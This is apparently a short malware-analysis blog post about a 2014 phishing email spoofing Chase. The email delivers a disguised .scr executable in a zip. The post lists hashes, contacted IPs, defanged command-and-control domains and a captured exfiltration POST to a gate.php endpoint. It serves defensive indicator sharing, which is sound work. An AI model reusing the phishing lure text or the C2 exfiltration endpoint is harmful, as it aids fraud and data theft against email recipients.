Email:
From: Chase Morgan [mailto:gens@chase.com]
Sent: Tuesday, January 07, 2014 3:36 AM
Subject: Transaction Alert
Dear Customer,
Below attached is copy of the Telegraphic transfer slip as initiated from our bank to your account as instructed by,your adviced to print out copy of transfer slip for confirmation.
Regards,
Dennison Mark
#note they still cant spell :P
# File
Zip File attachment: Payment_Slip.zip
File is actually a Payment Slip.scr
#DFIR
#DFIR
https://malwr.com/analysis/ZDAxMzRhNWI3YWU5NDQ4NmE4ZGY3ZjNkZjZjOTAzOTI/
| FILE NAME | Payment Slip.scr |
|---|---|
| FILE SIZE | 229689 bytes |
| FILE TYPE | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5 | ddf15baab37ffb9d63c8095f6fad20f0 |
| SHA1 | c56ca8e346a9ff2f3de9d44d2aa9f6662ddfc8fe |
| SHA256 | 84c595902978bf5a9a9343b62c8a650e34b3000355ce8b554887dd4e37989c3e |
| SHA512 | db307fd4c251a8507f5a497353bac95473b02aed3b5b964f303f99e71a0bf65b5e5eb35dc5fed7cd89bc39c85fdb87bdf5e563be49e4525b0a91193a8a578885 |
| CRC32 | 20434565 |
| SSDEEP | 6144:n0PyNAsjNceWItMN8HedzJenWoQAJD0N4YEv2Fkbl:nUG68HmJenWoQsO4ZOFS |
| YARA |
|
Hosts
| IP |
|---|
| 208.64.67.36 |
| 74.125.136.105 |
| 74.125.136.94 |
Domains
| DOMAIN | IP |
|---|---|
| balharbourcondo[.]com | 208.64.67.36 |
| www.google.com | 74.125.136.103 |
| www.google.nl | 74.125.136.94 |
| http://balharbourcondo[.]com/item/gate[.]php {exfiltration snippet} | POST /item/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2) Host: balharbourcondo.com Content-Length: 346 Connection: Keep-Alive Cache-Control: no-cache \xddcC\x1bK-\x17\xf4Q\xc8\x0f\x03\xd9\x89\xc8Y\x9a\x1f<\xaa\x82\xc3\x9e\xdf\x8aTO\x07B\xdb\xeeT\xb9\xc9\xdf\xa8\xe1\x0c\xe8\xae=\x00\xb7=i\x17\xf9\xcd\x08V0\x84\x8a\xa1&"\x0f\xfa!\x1d\xdbd\xcbv\x00\x8b^\xf4\xc7!e\xa6\xef(\xba\xac\xcbf\xfd\xb4\xa4!T6V\xb1\xafg\xdb\xdcG\x96i\xfa\xa5\x95\x18%\x8c\x84TqrrF\xc7\x8a\xc3L\x90o\xef \xe9\xf9v"\xdc.6-.\x00\xe1&\xd2\x03\xbaI\x98P \xf2\x15u\xb8*\x81\xfaY\x960Y\xd5\x0e\x90\x07o'r`\x15\xe1vr\x14\xda\x1a\xe2\xad\xe5Ir\xa4\xd5\xd0\x95\xca^|t\x80\xd7\xe3z\xdb%v\x96\xa4\xc3-!\xeb\x19\xd5\xe1\xb4\x92\xc6v\x84yrI\xd6\xf5N\xfcw\xca\x86;\xf8\xea\xc8C\x94\x8a\xdb|\xf4\x97J\xa4m\xf6dV\xa2\xed\x84G-\x91\xa6\x92?\xe9\x1e\xad\xfd\x87"e\xaf\xa6\x1e\x7fs\xdb\x80BTb\x03\x99\x19\x87\xc6\xf5@EEtE\x04\xba\xd9\xc5 Gy &/\xc2Ha\xcd\xf8\xe4\xb5\x1c\xc6R\x83\x1c\xa4G'\xeb\xa6P\xab\x0f:o\xf3\x1bP\xa6\xe4T\x9f\xa6\xf9\x16\xb4ut\xaf^X\xcf@\xa0\x1aZb\x0e \xbaJ\x93\x87\xd8[\x02E\xe3\xf2\xe2'\xa5\xeeu\\xe2\xf9^ \xb1\xe6\x8c!S\x9a\x18\xac,\x12\xfe\xacf |
IP ADDRESSES
| First seen | Last seen | IPs |
|---|---|---|
| 10/10/13 | 1/7/14 |
|
KNOWN DOMAINS HOSTED BY 208.64.67.36
balharbourcondofl[.]com
bronxdentistny[.]com
buy400sunnyislescondo[.]com
ns1[.]thinkwmb[.]ru
thinkwmb[.]ru
balharbourcondo[.]com
posrednikusaebay[.]ru
serial[.]allz.su
serialls[.]biz
balharbourbellini[.]com
buychateaubeach[.]com
sunnyislesrealestatecondos[.]com
buymansionsatacqualina[.]com
buyporshedesigntower[.]com
mir-automatiki[.]ru
sellturnberryoceancolony[.]com
balharbourmajestictowers[.]com
stregisandbalharbour[.]com
ftp[.]deeplogic[.]us
No comments:
Post a Comment